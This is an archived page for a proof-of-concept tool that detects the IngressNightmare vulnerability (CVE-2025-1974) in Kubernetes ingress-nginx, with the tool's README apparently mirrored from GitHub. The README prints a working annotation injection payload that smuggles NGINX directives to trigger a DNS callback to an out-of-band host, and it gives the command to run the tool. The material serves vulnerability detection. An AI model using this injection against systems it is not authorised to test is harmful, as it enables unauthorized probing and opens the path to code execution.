Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-1974 PoC — Kubernetes ingress-nginx 安全漏洞

Source
https://github.com/m-q-t/ingressnightmare-detection-poc
Associated Vulnerability
Title:Kubernetes ingress-nginx 安全漏洞 (CVE-2025-1974)
Description:Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。 Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。
Description
Proof-of-Concept Tool to detect IngressNightmare (CVE-2025-1974) via (non-intrusive) active means.
Readme
# IngressNightmare Detection Tool

## Overview

This tool provides a non-intrusive detection capability for the IngressNightmare vulnerability chain ([CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)) affecting Ingress NGINX Controller. It specifically leverages the auth-url annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to verify the presence of this critical vulnerability without executing arbitrary code.

## Technical Background

The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through various Ingress annotation fields. When these malicious Ingress resources are processed by the admission controller, the injected directives are evaluated during the NGINX configuration validation phase (`nginx -t`).

This PoC specifically exploits the `auth-url` annotation vulnerability by injecting the `error_log` directive with a syslog server pointing to an attacker-controlled domain. During configuration validation, NGINX will:

1. Parse the injected configuration
2. Resolve the specified domain via DNS

This DNS resolution activity provides a reliable signal that the target is vulnerable without requiring code execution or service disruption.

## Usage

1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.

2. Execute the detection tool:
   ```
   $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
   ```

3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain:

![poc](./poc.png)

## Detection Methodology

The tool crafts a specially formed AdmissionReview object containing an Ingress resource with the following injection payload:

```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```

This payload:
- Uses the comment character (`#`) to terminate the URL
- Injects a newline followed by a resolver directive
- Adds the `error_log` directive with syslog pointing to the DNS callback domain
- Comments out the remainder to maintain syntactic validity

When processed by a vulnerable admission controller, this results in an outbound DNS lookup that confirms the presence of the vulnerability.

## Limitations

This tool only detects the presence of the vulnerability and does not attempt to exploit it for arbitrary code execution.

## Credits

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
File Snapshot

 [4.0K]  /data/pocs/6e2e313a2110bf5ccfddbd5f8d3cba307e5bfbca
├── [3.1K]  detect.py
├── [1.3K]  poc.json
├── [ 88K]  poc.png
└── [2.5K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.